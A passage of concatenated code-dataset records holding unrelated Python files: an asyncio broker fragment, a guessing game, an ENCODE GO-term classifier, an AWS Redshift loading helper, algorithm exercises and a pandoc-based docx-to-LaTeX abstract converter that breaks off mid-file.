%s' % e)\n yield from send_error(writer, str(e))\n\n writer.close()\n\ndef run_server(hostname='localhost', port=14141, loop=None):\n if loop is None:\n loop = asyncio.get_event_loop()\n coro = asyncio.start_server(handle_message, hostname, port, loop=loop)\n server = loop.run_until_complete(coro)\n print('Serving on %s' % (server.sockets[0].getsockname(),))\n print('Press Ctrl + C to stop the application')\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n server.close()\n loop.run_until_complete(server.wait_closed())\n loop.close()\n","sub_path":"src/notibroker/broker.py","file_name":"broker.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"638641601","text":"from random import randint# 该版本实现的功能有:1、根据玩家姓名进行游戏数据的记录(存在save.txt中)\nimport datetime,time #2、游戏记录中添加了一项猜出数字最短时间的记录\n\nname=input('请输入玩家名字:')\n\nf=open('save.txt')\nlines=f.readlines()\nf.close()\n\nscores={}\nfor l in lines:\n s=l.split()\n scores[s[0]]=s[1:]\nscore=scores.get(name)\nif(score is None):\n score=[0,0,0,0]\n\ngame_times=int(score[0])\nmin_times=int(score[1])\ntotal_times=int(score[2])\nmin_t=int(score[3])\nif(game_times > 0):\n avg_times=float(total_times)/game_times\nelse:\n avg_times=0\nif(game_times==0):\n print('欢迎你玩这个游戏')\nelse:\n print('%s,你已经玩了%d次了,最少%d轮猜出答案,平均%.2f轮猜出答案,最少用%d秒猜出答案。' % (name,game_times,min_times,avg_times,min_t))\n\nnum=randint(1,100)\ntimes=0\nbingo=True\nwhile(bingo):\n times+=1\n if(times==1):\n answer=int(input('输入数字开始游戏:'))\n start=datetime.datetime.now()\n else:\n answer=int(input('请猜数字:'))\n if(answer>num):\n print('太大')\n elif(answer<num):\n print('太小')\n else:\n print('猜对了!')\n bingo=False\n\nend=datetime.datetime.now()\nt=(end-start).seconds\nif(game_times==0 or min_times>times):\n min_times=times\nif(game_times==0 or min_t>t):\n min_t=t\ntotal_times+=times\ngame_times+=1\n\n\nscores[name]=[str(game_times),str(min_times),str(total_times),str(min_t)]\nresult=''\nfor n in scores:\n line=n+' '+' '.join(scores[n])+'\\n'\n result += line\n \nf=open('save.txt','w')\nf.write(result)\nf.close()","sub_path":"guessnum2.1.py","file_name":"guessnum2.1.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"451029353","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport json\nimport logging\nimport sys\n\nimport requests\n\nlogging.basicConfig(\n stream=sys.stdout,\n level=logging.INFO,\n format='[%(asctime)s] %(name)s:%(levelname)s: %(message)s',\n)\nlogger = logging.getLogger(__name__)\n\n\ndef encode_go_term_classes():\n go_obo_url = 'http://purl.obolibrary.org/obo/go.obo'\n encode_go_class_dict = {\n 'GO:0003700': 'transcription factor',\n 'GO:0003723': 'RNA binding protein',\n 'GO:0001070': 'RNA binding protein',\n 'GO:0008134': 'cofactor',\n 'GO:0003712': 'cofactor',\n 'GO:0005736': 'RNA polymerase complex',\n 'GO:0016591': 'RNA polymerase complex',\n 'GO:0005666': 'RNA polymerase complex',\n 'GO:0006325': 'chromatin remodeler',\n 'GO:0000118': 'chromatin remodeler',\n 'GO:0007062': 'cohesin',\n 'GO:0006260': 'DNA replication',\n 'GO:0006281': 'DNA repair',\n 'GO:0000788': 'histone',\n 'GO:0003677': 'backup label-transcription factor',\n 'GO:0003682': 'backup label-transcription factor',\n 'GO:0043167': 'backup label-transcription factor',\n }\n term_dict = {}\n with requests.get(go_obo_url, stream=True) as go_obo:\n # https://owlcollab.github.io/oboformat/doc/GO.format.obo-1_4.html#S.2.2\n for stanza in go_obo.iter_lines(decode_unicode=True, delimiter='\\n\\n'):\n if not stanza:\n continue\n lines = 
stanza.split('\\n')\n if len(lines) < 2:\n raise ValueError(\n 'Stanza \"{}\" has fewer than 2 lines.'.format(stanza)\n )\n stanza_type = lines[0]\n if stanza_type != '[Term]':\n continue\n if not lines[1].startswith('id: '):\n raise ValueError(\n 'Stanza \"{}\" fails to start with an id tag.'.format(stanza)\n )\n term_id = lines[1].split(': ')[1]\n term_dict[term_id] = set()\n for tag_value_pair in lines[2:]:\n tag, value = tag_value_pair.split(': ', maxsplit=1)\n if tag in ['is_a', 'alt_id', 'replaced_by']:\n term_dict[term_id].add(value.split(' ', maxsplit=1)[0])\n continue\n if tag in ['relationship', 'intersection_of']:\n relationship, go_id, _ = value.split(' ', maxsplit=2)\n # The following relations are defined by [Typedef] stanzas\n if relationship in [\n 'part_of',\n 'regulates',\n 'negatively_regulates',\n 'positively_regulates',\n 'occurs_in'\n ]:\n term_dict[term_id].add(go_id)\n term_classifications = {}\n for term_id in term_dict:\n new_terms = {term_id} - term_dict[term_id]\n # Extend related terms until there are no new terms to be added\n # Self term ID is not added in the loop above so that there will be at\n # least one round of checking\n while new_terms:\n term_dict[term_id] |= new_terms\n new_terms = set()\n for related_term_id in term_dict[term_id]:\n new_terms |= term_dict.get(\n related_term_id, set()\n ) - term_dict[term_id]\n # Get ENCODE classifications\n encode_go_classes = {\n encode_go_class_dict[related_term_id]\n for related_term_id in term_dict[term_id]\n if related_term_id in encode_go_class_dict\n }\n if not encode_go_classes:\n continue\n if (\n 'backup label-transcription factor' in encode_go_classes\n and len(encode_go_classes) > 1\n ):\n encode_go_classes.remove('backup label-transcription factor')\n if encode_go_classes == {'chromatin remodeler', 'histone'}:\n encode_go_classes = {'histone'}\n if encode_go_classes == {'chromatin remodeler', 'DNA replication'}:\n encode_go_classes = {'chromatin remodeler'}\n if encode_go_classes == {'DNA repair', 'DNA replication'}:\n encode_go_classes = {'DNA repair'}\n term_classifications[term_id] = list(encode_go_classes)\n fname = 'ENCODE_GO_map.json'\n logger.info('Save ENCODE GO category map to {}'.format(fname))\n with open(fname, 'x') as f:\n json.dump(term_classifications, f)\n return term_classifications\n\n\ndef classify_go_evidence(go_evidence_list, encode_go_classes):\n # Get best evidenced classes and their evidence count\n evidence_weight = {\n 'EXP': 2,\n 'IDA': 2,\n 'IMP': 2,\n 'IGI': 2,\n 'IEP': 2,\n 'HTP': 1,\n 'HDA': 1,\n 'HMP': 1,\n 'HGI': 1,\n 'HEP': 1,\n 'TAS': 1,\n 'IEA': -1\n }\n best_weight = -1\n best_evidenced_classes = {}\n for go_id, evidence in go_evidence_list:\n weight = evidence_weight.get(evidence, -1)\n if weight < best_weight:\n continue\n clazz = encode_go_classes.get(go_id)\n if not clazz:\n continue\n if weight > best_weight:\n best_weight = weight\n best_evidenced_classes = {c: 1 for c in clazz}\n elif weight == best_weight:\n for c in clazz:\n if c in best_evidenced_classes:\n best_evidenced_classes[c] += 1\n else:\n best_evidenced_classes[c] = 1\n if 'backup label-transcription factor' in best_evidenced_classes:\n if len(best_evidenced_classes) == 1:\n return ['transcription factor']\n best_evidenced_classes.pop('backup label-transcription factor')\n return [\n clz for clz in best_evidenced_classes\n if best_evidenced_classes[clz] == max(best_evidenced_classes.values())\n ]\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Calculate ENCODE category for a 
\n\ndef main():\n    parser = argparse.ArgumentParser(\n        description='Calculate ENCODE category for a target.'\n    )\n    parser.add_argument(\n        '--uniprots',\n        nargs='+',\n        help='One or more UniProt ID(s). For example, Q9H9Z2'\n    )\n    parser.add_argument(\n        '--mgis',\n        nargs='+',\n        help='One or more MGI ID(s). For example, 1890546'\n    )\n    parser.add_argument(\n        '--fbs',\n        nargs='+',\n        help='One or more FlyBase ID(s). For example, FBgn0035626'\n    )\n    parser.add_argument(\n        '--wbs',\n        nargs='+',\n        help='One or more WormBase ID(s). For example, WBGene00003014'\n    )\n    parser.add_argument(\n        '--encode-go-map',\n        default='ENCODE_GO_map.json',\n        help='A JSON file mapping GO terms to ENCODE target categories.'\n    )\n    parser.add_argument(\n        '--get-new-encode-go-map',\n        action='store_true',\n        help='Build a fresh ENCODE GO category map instead of loading one '\n        'from the JSON file.'\n    )\n    args = parser.parse_args()\n    if not (args.uniprots or args.mgis or args.fbs or args.wbs):\n        parser.print_help()\n        parser.exit(\n            status=1,\n            message='ERROR: At least one ID from UniProtKB, MGI, FlyBase or '\n            'WormBase is required!\\n'\n        )\n    if args.get_new_encode_go_map:\n        encode_go_dict = encode_go_term_classes()\n    else:\n        try:\n            with open(args.encode_go_map) as f:\n                encode_go_dict = json.load(f)\n        except Exception as e:\n            raise ValueError(\n                'Failed to load ENCODE GO category map at {}. Please either '\n                'provide a valid ENCODE GO category map in JSON format or use '\n                '\"--get-new-encode-go-map\" and ensure internet connection.'\n                .format(args.encode_go_map)\n            ) from e\n    bioentity_ids = set()\n    if args.uniprots:\n        bioentity_ids |= {'\"UniProtKB:{}\"'.format(i) for i in args.uniprots}\n    if args.mgis:\n        bioentity_ids |= {'\"MGI:MGI:{}\"'.format(i) for i in args.mgis}\n    if args.fbs:\n        bioentity_ids |= {'\"FB:{}\"'.format(i) for i in args.fbs}\n    if args.wbs:\n        bioentity_ids |= {'\"WB:{}\"'.format(i) for i in args.wbs}\n    filter_query = ' OR '.join(bioentity_ids)\n    golr_base_url = 'http://golr-aux.geneontology.io/solr/select?fq=document_category:\"annotation\"&q=*:*&fq=bioentity:({})&rows={}&wt=json' # noqa: E501\n    rows_count = requests.get(\n        golr_base_url.format(filter_query, 1)\n    ).json()['response']['numFound']\n    print(golr_base_url.format(filter_query, rows_count))\n    go_evidence = [\n        (annotation['annotation_class'], annotation['evidence_type'])\n        for annotation in requests.get(\n            golr_base_url.format(filter_query, rows_count)\n        ).json()['response']['docs']\n    ]\n    logger.info(classify_go_evidence(go_evidence, encode_go_dict))\n\n\nif __name__ == \"__main__\":\n    # execute only if run as a script\n    main()\n","sub_path":"ENCODE_target/classify_targets.py","file_name":"classify_targets.py","file_ext":"py","file_size_in_byte":8885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"464422829","text":"import json\nimport logging\n\nimport pg8000\n\nfrom awswrangler.exceptions import (\n    RedshiftLoadError,\n    UnsupportedType,\n    InvalidDataframeType,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass Redshift:\n    def __init__(self, session):\n        self._session = session\n\n    @staticmethod\n    def generate_connection(database, host, port, user, password):\n        conn = pg8000.connect(\n            database=database,\n            host=host,\n            port=int(port),\n            user=user,\n            password=password,\n            ssl=False,\n        )\n        cursor = conn.cursor()\n        cursor.execute(\"set statement_timeout = 1200000\")\n        conn.commit()\n        cursor.close()\n        return conn\n\n    def get_connection(self, glue_connection):\n        conn_details = self._session.glue.get_connection_details(\n            name=glue_connection)\n        props = conn_details[\"ConnectionProperties\"]\n        host = 
props[\"JDBC_CONNECTION_URL\"].split(\":\")[2].replace(\"/\", \"\")\n        port, database = props[\"JDBC_CONNECTION_URL\"].split(\":\")[3].split(\"/\")\n        user = props[\"USERNAME\"]\n        password = props[\"PASSWORD\"]\n        conn = self.generate_connection(database=database,\n                                        host=host,\n                                        port=int(port),\n                                        user=user,\n                                        password=password)\n        return conn\n\n    def write_load_manifest(self, manifest_path, objects_paths):\n        objects_sizes = self._session.s3.get_objects_sizes(\n            objects_paths=objects_paths)\n        manifest = {\"entries\": []}\n        for path, size in objects_sizes.items():\n            entry = {\n                \"url\": path,\n                \"mandatory\": True,\n                \"meta\": {\n                    \"content_length\": size\n                }\n            }\n            manifest.get(\"entries\").append(entry)\n        payload = json.dumps(manifest)\n        client_s3 = self._session.boto3_session.client(\n            service_name=\"s3\", config=self._session.botocore_config)\n        bucket, path = manifest_path.replace(\"s3://\", \"\").split(\"/\", 1)\n        client_s3.put_object(Body=payload, Bucket=bucket, Key=path)\n        return manifest\n\n    @staticmethod\n    def get_number_of_slices(redshift_conn):\n        cursor = redshift_conn.cursor()\n        cursor.execute(\n            \"SELECT COUNT(*) as count_slices FROM (SELECT DISTINCT node, slice from STV_SLICES)\"\n        )\n        count_slices = cursor.fetchall()[0][0]\n        cursor.close()\n        return count_slices\n\n    @staticmethod\n    def load_table(\n        dataframe,\n        dataframe_type,\n        manifest_path,\n        schema_name,\n        table_name,\n        redshift_conn,\n        num_files,\n        iam_role,\n        mode=\"append\",\n        preserve_index=False,\n    ):\n        cursor = redshift_conn.cursor()\n        if mode == \"overwrite\":\n            cursor.execute(\"-- AWS DATA WRANGLER\\n\"\n                           f\"DROP TABLE IF EXISTS {schema_name}.{table_name}\")\n        schema = Redshift._get_redshift_schema(\n            dataframe=dataframe,\n            dataframe_type=dataframe_type,\n            preserve_index=preserve_index,\n        )\n        cols_str = \"\".join([f\"{col[0]} {col[1]},\\n\" for col in schema])[:-2]\n        sql = (\n            \"-- AWS DATA WRANGLER\\n\"\n            f\"CREATE TABLE IF NOT EXISTS {schema_name}.{table_name} (\\n{cols_str}\"\n            \") DISTSTYLE AUTO\")\n        cursor.execute(sql)\n        sql = (\"-- AWS DATA WRANGLER\\n\"\n               f\"COPY {schema_name}.{table_name} FROM '{manifest_path}'\\n\"\n               f\"IAM_ROLE '{iam_role}'\\n\"\n               \"MANIFEST\\n\"\n               \"FORMAT AS PARQUET\")\n        cursor.execute(sql)\n        cursor.execute(\n            \"-- AWS DATA WRANGLER\\n SELECT pg_last_copy_id() AS query_id\")\n        query_id = cursor.fetchall()[0][0]\n        sql = (\n            \"-- AWS DATA WRANGLER\\n\"\n            f\"SELECT COUNT(*) as num_files_loaded FROM STL_LOAD_COMMITS WHERE query = {query_id}\"\n        )\n        cursor.execute(sql)\n        num_files_loaded = cursor.fetchall()[0][0]\n        if num_files_loaded != num_files:\n            redshift_conn.rollback()\n            cursor.close()\n            raise RedshiftLoadError(\n                f\"Redshift load rolled back. {num_files_loaded} files counted. 
{num_files} expected.\"\n            )\n        redshift_conn.commit()\n        cursor.close()\n\n    @staticmethod\n    def _get_redshift_schema(dataframe, dataframe_type, preserve_index=False):\n        schema_built = []\n        if dataframe_type == \"pandas\":\n            if preserve_index:\n                name = str(\n                    dataframe.index.name) if dataframe.index.name else \"index\"\n                dataframe.index.name = \"index\"\n                dtype = str(dataframe.index.dtype)\n                redshift_type = Redshift._type_pandas2redshift(dtype)\n                schema_built.append((name, redshift_type))\n            for col in dataframe.columns:\n                name = str(col)\n                dtype = str(dataframe[name].dtype)\n                redshift_type = Redshift._type_pandas2redshift(dtype)\n                schema_built.append((name, redshift_type))\n        elif dataframe_type == \"spark\":\n            for name, dtype in dataframe.dtypes:\n                redshift_type = Redshift._type_spark2redshift(dtype)\n                schema_built.append((name, redshift_type))\n        else:\n            raise InvalidDataframeType(dataframe_type)\n        return schema_built\n\n    @staticmethod\n    def _type_pandas2redshift(dtype):\n        dtype = dtype.lower()\n        if dtype == \"int32\":\n            return \"INTEGER\"\n        elif dtype == \"int64\":\n            return \"BIGINT\"\n        elif dtype == \"float32\":\n            return \"FLOAT4\"\n        elif dtype == \"float64\":\n            return \"FLOAT8\"\n        elif dtype == \"bool\":\n            return \"BOOLEAN\"\n        elif dtype == \"object\":\n            return \"VARCHAR(256)\"\n        elif dtype[:10] == \"datetime64\":\n            return \"TIMESTAMP\"\n        else:\n            raise UnsupportedType(\"Unsupported Pandas type: \" + dtype)\n\n    @staticmethod\n    def _type_spark2redshift(dtype):\n        dtype = dtype.lower()\n        if dtype == \"int\":\n            return \"INTEGER\"\n        elif dtype == \"long\":\n            return \"BIGINT\"\n        elif dtype == \"float\":\n            return \"FLOAT8\"\n        elif dtype == \"bool\":\n            return \"BOOLEAN\"\n        elif dtype == \"string\":\n            return \"VARCHAR(256)\"\n        elif dtype == \"timestamp\":\n            return \"TIMESTAMP\"\n        else:\n            raise UnsupportedType(\"Unsupported Spark type: \" + dtype)\n","sub_path":"awswrangler/redshift.py","file_name":"redshift.py","file_ext":"py","file_size_in_byte":6763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"130404636","text":"def max_rectangle_under_skyline(heights):\n\n    pillars = []\n    max_area = 0\n    # iterate with a sentinel height of 0 appended so that every pillar\n    # left on the stack is flushed at the end of the sweep\n    for i, h in enumerate(heights + [0]):\n        while pillars and h <= heights[pillars[-1]]:\n            height = heights[pillars.pop()]\n            width = i - pillars[-1] - 1 if pillars else i\n            area = height * width\n            max_area = max(area, max_area)\n        pillars.append(i)\n    return max_area\n
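\n# A worked check (hypothetical input): for heights [1, 3, 2] the sweep pops\n# 3 at i=2 (area 3*1), then the sentinel flushes 2 (area 2*2 = 4) and\n# 1 (area 1*3), so:\n#\n#     max_rectangle_under_skyline([1, 3, 2])  # -> 4\n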
","sub_path":"revise-daily/arjuna-vishwamitra-abhimanyu/epi/greedy-algorithms/2_compute_largest_rectangle_under_skyline.py","file_name":"2_compute_largest_rectangle_under_skyline.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"44359728","text":"# import libraries\nimport hashlib\n\n\nclass Miner:\n\n    @staticmethod\n    def mine(message, difficulty=1):\n        assert difficulty >= 1\n        prefix = '1' * difficulty\n        for i in range(1000):\n            # sha256 needs bytes, and a hex digest to compare with the prefix\n            digest = hashlib.sha256(\n                (str(hash(message)) + str(i)).encode()).hexdigest()\n            if digest.startswith(prefix):\n                print(\"after \" + str(i) + \" iterations found nonce: \" + digest)\n                return digest\n","sub_path":"Miners.py","file_name":"Miners.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"75060090","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\ndef p_times(statement, num):\n    for i in range(num):\n        print(statement)\n    \np_times(\"Hello There\", 4)\n\n\n# In[2]:\n\n\ndef letter_count(string):\n    dd = {}\n    for letter in string:\n        if letter in dd:\n            dd[letter] += 1\n        else:\n            dd[letter] = 1\n    print(dd)\n\nletter_count(\"Domingo\")\n\n\n# In[3]:\n\n\ncontacts = {\n    'Brian': '333-333-3333',\n    'Lenny': '444-444-4444',\n    'Daniel': '777-777-7777'\n}\n\ndef print_contacts(contact):\n    for x, y in contact.items():\n        print(f\"{x} has a phone number of {y}\")\n\nprint_contacts(contacts)\n\n\n# In[4]:\n\n\n\ndef multiply_by(arr, num):\n    newList = []\n\n    for numbers in arr: \n        newList.append(numbers * num) \n    print(newList)\n\nmultiply_by([1,2,3,4], 5)\n\n\n# In[5]:\n\n\nimport math\n\ndef factorial(n):\n    return math.factorial(n) \n\nprint(factorial(5))\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"420192711","text":"##################### Created by Wilson Zeng on April 27th, 2019 ##############################\r\n\r\nfrom bs4 import BeautifulSoup\r\nimport subprocess\r\nimport re\r\nimport os\r\n\r\n##################### Mutable Inputs: Can & Should be Updated as it Goes ######################\r\n\r\n# Available image extensions (mutable)\r\n# This code will find image files associated with the following extensions in the current\r\n# directory by matching the image file name against Lastname_Firstname.docx\r\n# !Important: Potential manual work before executing the script is fixing typos in people's\r\n# filenames. Apparently people misspell their own names nowadays.\r\nimage_ext = ['.png', '.jpg']\r\n\r\n# Extract file names in the current working directory into tuple: (file_name, extension)\r\nall_files = [os.path.splitext(f) for f in os.listdir('.') if os.path.isfile(f)]\r\ndoc_files = [file_tuple for file_tuple in all_files if '.docx' in file_tuple[1]]\r\nfig_files = [file_tuple for file_tuple in all_files if file_tuple[1] in image_ext]\r\n\r\n# Sorted by submitters' last names alphabetically\r\ndoc_files = sorted(doc_files, key=lambda x: x[0])\r\n\r\n# Code output will be written to output_tex\r\noutput_tex = 'output.tex'\r\n\r\n# Clear current output file if available\r\nlatex = open(output_tex, 'w')\r\nlatex.close()\r\n\r\n# Sanity Zone; please update as you go..\r\n# As far as I am aware, PANDOC processes '&' and '%' correctly.\r\n# Do not double-process them by adding to the dictionary special_characters!!\r\ngreek = {'α': r'$\\\alpha$', 'β': r'$\\\beta$', 'γ': r'$\\\gamma$', 'δ': r'$\\\delta$',\r\n         'ε': r'$\\\epsilon$', 'ζ': r'$\\\zeta$', 'η': r'$\\\eta$', 'θ': r'$\\\theta$',\r\n         'ι': r'$\\\iota$', 'κ': r'$\\\kappa$', 'λ': r'$\\\lambda$', 'μ': r'$\\\mu$',\r\n         'ν': r'$\\\nu$', 'ξ': r'$\\\xi$', 'π': r'$\\\pi$', 'ρ': r'$\\\rho$', 'σ': r'$\\\sigma$',\r\n         'τ': r'$\\\tau$', 'υ': r'$\\\upsilon$', 'φ': r'$\\\phi$', 'χ': r'$\\\chi$', 'ψ': r'$\\\psi$', 'ω': r'$\\\omega$'}\r\nlatin_with_accents = {'é': r'\\'{e}', 'è': r'\\`{e}', 'ü': r'\\\"{u}', 'ä': r'\\\"{a}', 'ö': r'\\\"{o}'}\r\n\r\n# The symbol I know PANDOC does not handle properly\r\nfix_pandoc = {r'\\textasciitilde{}': r'$\\sim$' # PANDOC gives '\\textasciitilde{}' for tilde, but it ends up being the tilde that is too high up\r\n              }\r\n# PANDOC handles most special characters already, except \"~\", which is addressed in fix_pandoc (2019-04-28)\r\n# If there are any other special characters PANDOC didn't parse, might want to add it to special_characters.\r\n# For the ones which PANDOC processes into something not desired, might want to add it to fix_pandoc 
instead.\r\nspecial_characters = {}\r\n\r\n# Pool all fixes together. These fixes will be applied after we have allowed PANDOC to do its job (i.e. to clean up what PANDOC did not do a great job in).\r\nminor_fixes = {**greek, **latin_with_accents, **fix_pandoc, **special_characters}\r\n\r\n# Name segments that should not be capitalized\r\n# Anything else? Please update :)\r\ndo_not_capitalize = ['van', 'der', 'van\\'t']\r\n\r\n################################## Functions! Functions! ######################################\r\n# General conversion of text extracted from html into latex format\r\n# First let PANDOC handle the dirty work\r\n# Then apply our specific fixes\r\n# text: str, the text to be converted\r\n# Returns: str, the input text in latex format\r\ndef textfix(text):\r\n    #return text\r\n    if '\\n' in text:\r\n        paragraphs = text.split('\\n')\r\n    else:\r\n        paragraphs = [text]\r\n    fixed_paragraphs = []\r\n    for p in paragraphs:\r\n        s = subprocess.run(['pandoc', '-f', 'html', '-t', 'latex'], input=p, stdout=subprocess.PIPE, universal_newlines=True)\r\n        fixed_text = s.stdout[:-1]\r\n        for fix in minor_fixes.keys():\r\n            fixed_text = fixed_text.replace(fix, minor_fixes[fix])\r\n        fixed_text = ' '*(len(p)-len(p.lstrip())) + fixed_text + ' '*(len(p)-len(p.rstrip())) #Side effect of pandoc is that it strips off the leading/trailing white spaces\r\n        fixed_text = fixed_text.replace('\\n', ' ')\r\n        fixed_paragraphs.append(fixed_text)\r\n    total_fixed_text = r'\\\\'.join(fixed_paragraphs)\r\n    return total_fixed_text\r\n\r\n# Function to be called to write the beginning & end of the main abstract latex environment\r\ndef choose_template(references=False, figure=False):\r\n    if not references and not figure:\r\n        return {'begin': r'\\begin{posterabs}', 'end': r'\\end{posterabs}'}\r\n    if not references:\r\n        return {'begin': r'\\begin{posterabswfig}', 'end': r'\\end{posterabswfig}'}\r\n    if not figure:\r\n        return {'begin': r'\\begin{posterabswref}', 'end': r'\\end{posterabswref}'}\r\n    return {'begin': r'\\begin{posterabswrefwfig}', 'end': r'\\end{posterabswrefwfig}'}\r\n\r\n# Function to be called to write abstract title in latex\r\ndef proc_title(title=''):\r\n    return '{'+title+'}'\r\n\r\n# Function to be called to process an author's information (variable 'author')\r\n# An author information is a tuple: (presenting, First_name, ..., Last_name)\r\n# If the author is the presenting author, presenting == True, and vice versa\r\n# Returns the name string of the author separated by spaces, as well as whether the author is presenting\r\ndef proc_author_info(author):\r\n    presenting = author[0]\r\n    name_components = []\r\n    for name in author[1:]:\r\n        if name in do_not_capitalize:\r\n            name_components.append(textfix(name))\r\n        else:\r\n            name_components.append(textfix(name.capitalize()))\r\n    if presenting:\r\n        return {'name': r'\\underline{'+' '.join(name_components)+'}', 'presenting?': presenting}\r\n    return {'name': ' '.join(name_components), 'presenting?': presenting}\r\n\r\n# Function to be called to process a list of authors' information and the corresponding affiliation numbers\r\n# authors are a list of author information tuples; affiliations are a list of lists of corresponding affiliation numbers (as strings of integers)\r\n# Returns: 1. str, the list of authors with annotated affiliations in latex format; 2. 
presenting_author's label string in the format: LastF\r\ndef proc_authors(authors, affiliations):\r\n    author_tex = []\r\n    label = ''\r\n    for author, assoc_affil in zip(authors, affiliations):\r\n        author_string = proc_author_info(author)['name']+',$^{'+','.join(assoc_affil)+'}$'\r\n        author_tex.append(author_string)\r\n        if proc_author_info(author)['presenting?']:\r\n            label = author[-1].capitalize() + author[1][0].capitalize()\r\n    author_tex_string = '{'+' '.join(author_tex)+'}'\r\n    return {'tex': author_tex_string, 'label': label}\r\n\r\n# Function to be called to produce affiliations in latex format\r\ndef proc_affil(affil_info):\r\n    affiliation_texts = ['{']\r\n    for n in sorted(list(affil_info.keys())):\r\n        if n == max(list(affil_info.keys())):\r\n            affiliation_texts.append('$^'+str(n)+'$'+textfix(affil_info[n]))\r\n        else:\r\n            affiliation_texts.append('$^'+str(n)+'$'+textfix(affil_info[n])+r'\\\\')\r\n    affiliation_texts.append('}')\r\n    return affiliation_texts\r\n\r\n# Function to be called to write poster number in latex format\r\ndef proc_poster_num(poster_number='#'):\r\n    return r'{P\\#}'\r\n\r\n# Function to be called to write the lines that insert a figure in latex format\r\n# width and height are in number of pixels\r\ndef proc_fig(fig_file, width, height):\r\n    fig_texts = ['{'+fig_file+'}']\r\n    fig_texts.append('{'+str(width/100)+'}')\r\n    fig_texts.append('{'+str(height/100)+'}')\r\n    return fig_texts\r\n\r\n# Function to be called to produce references in latex format\r\ndef proc_ref(ref_info):\r\n    reference_texts = ['{']\r\n    for n in sorted(list(ref_info.keys())):\r\n        if n == max(list(ref_info.keys())):\r\n            reference_texts.append('{['+str(n)+']} '+ref_info[n])\r\n        else:\r\n            reference_texts.append('{['+str(n)+']} '+ref_info[n]+r'\\\\')\r\n    reference_texts.append('}')\r\n    return reference_texts\r\n\r\n# Function to be called to write the latex file output\r\ndef write_latex(output_name, title, authors, associated_affiliations, affiliations_list, abstract_text, figure='', width=0, height=0, references=None):\r\n    if output_name[-4:] != '.tex' and '.' 
not in output_name:\r\n        output_name += '.tex'\r\n    ref_avail = bool(references)\r\n    fig_avail = len(figure) > 0\r\n\r\n    latex = open(output_name, 'a')\r\n    def write_line(line=''):\r\n        latex.write(line+'\\n')\r\n        return\r\n    write_line(choose_template(ref_avail, fig_avail)['begin'])\r\n    write_line(proc_title(title))\r\n    write_line(proc_authors(authors, associated_affiliations)['tex'])\r\n    for affil in proc_affil(affiliations_list):\r\n        write_line(affil)\r\n    write_line(proc_poster_num())\r\n    if ref_avail:\r\n        for ref in proc_ref(references):\r\n            write_line(ref)\r\n    if fig_avail:\r\n        for l in proc_fig(figure, width, height):\r\n            write_line(l)\r\n    write_line(abstract_text)\r\n\r\n    presenter_label = proc_authors(authors, associated_affiliations)['label']\r\n\r\n    #Some people forget to indicate presenting author...\r\n    if len(presenter_label) == 0:\r\n        #Assume filename is the presenter\r\n        presenter_label = file_id[0].split('_')[0].capitalize() + file_id[0].split('_')[1].capitalize()[0]\r\n\r\n    write_line(r'\\label'+'{'+presenter_label+'}')\r\n    write_line(choose_template(ref_avail, fig_avail)['end'])\r\n\r\n    presenting_author = [author[1:] for author in authors if author[0]]\r\n    #Some people forget to indicate presenting author...\r\n    if len(presenting_author) == 0:\r\n        presenting_author = [tuple(file_id[0].split('_'))]\r\n\r\n    presenting_name_components = []\r\n    for name in presenting_author[0]:\r\n        if name in do_not_capitalize:\r\n            presenting_name_components.append(name)\r\n        else:\r\n            presenting_name_components.append(name.capitalize())\r\n    presenting_author = ' '.join(presenting_name_components)\r\n\r\n    phantom = r'\\phantomsection\\addcontentsline{toc}{subsection}{\\hyperref['+presenter_label+']'+r'{\\textbf{'+presenting_author+'}'+r'\\\\'+proc_title(title)[1:-1]+'}'+'}'\r\n    write_line(phantom)\r\n    write_line()\r\n    latex.close()\r\n    return\r\n
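\r\n# For orientation (names hypothetical), one abstract block written to\r\n# output.tex looks roughly like this; the environment name comes from\r\n# choose_template and the poster number is currently hard-coded to 'P#':\r\n#\r\n#   \\begin{posterabswref}\r\n#   {Some abstract title}\r\n#   {\\underline{Jane Doe},$^{1}$ John Smith,$^{2}$}\r\n#   ...\r\n#   \\end{posterabswref}\r\n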
\r\n# docx to html by PANDOC. The way the subprocess.run() is written in this code requires this python code to be run under Unix Shell, such as Bash.\r\nfor file_id in doc_files:\r\n    ##################### Part I. Parsing Word File into HTML #####################\r\n    input_doc = ''.join(file_id)\r\n    print('Currently working on '+input_doc)\r\n    html_name = file_id[0]+'.html'\r\n    subprocess.run(['pandoc', input_doc, '-f', 'docx', '-t', 'html', '-o', html_name])\r\n\r\n    # Look whether submitter submitted a figure file\r\n    matching_figures = [''.join(fig_id) for fig_id in fig_files if fig_id[0].lower() == file_id[0].lower()]\r\n    if len(matching_figures) > 0:\r\n        fig_name = matching_figures[0]\r\n    else:\r\n        fig_name = ''\r\n    if len(fig_name) > 0:\r\n        print('Submitter has a figure: '+fig_name+'\\n')\r\n\r\n    # Parse html file into BeautifulSoup :) for ease of extracting contents\r\n    # See https://www.crummy.com/software/BeautifulSoup/bs4/doc/ for Beautiful Soup docs :)\r\n    f = open(html_name, 'r')\r\n    soup = BeautifulSoup(f, 'html.parser')\r\n\r\n    # Extract all table/cell contents into a list of table objects\r\n    all_tables = soup.find_all('table')\r\n\r\n    # If someone messed up the document so badly/did not use the submission template\r\n    if len(all_tables) == 0:\r\n        print(input_doc+' is problematic. No tables were found. 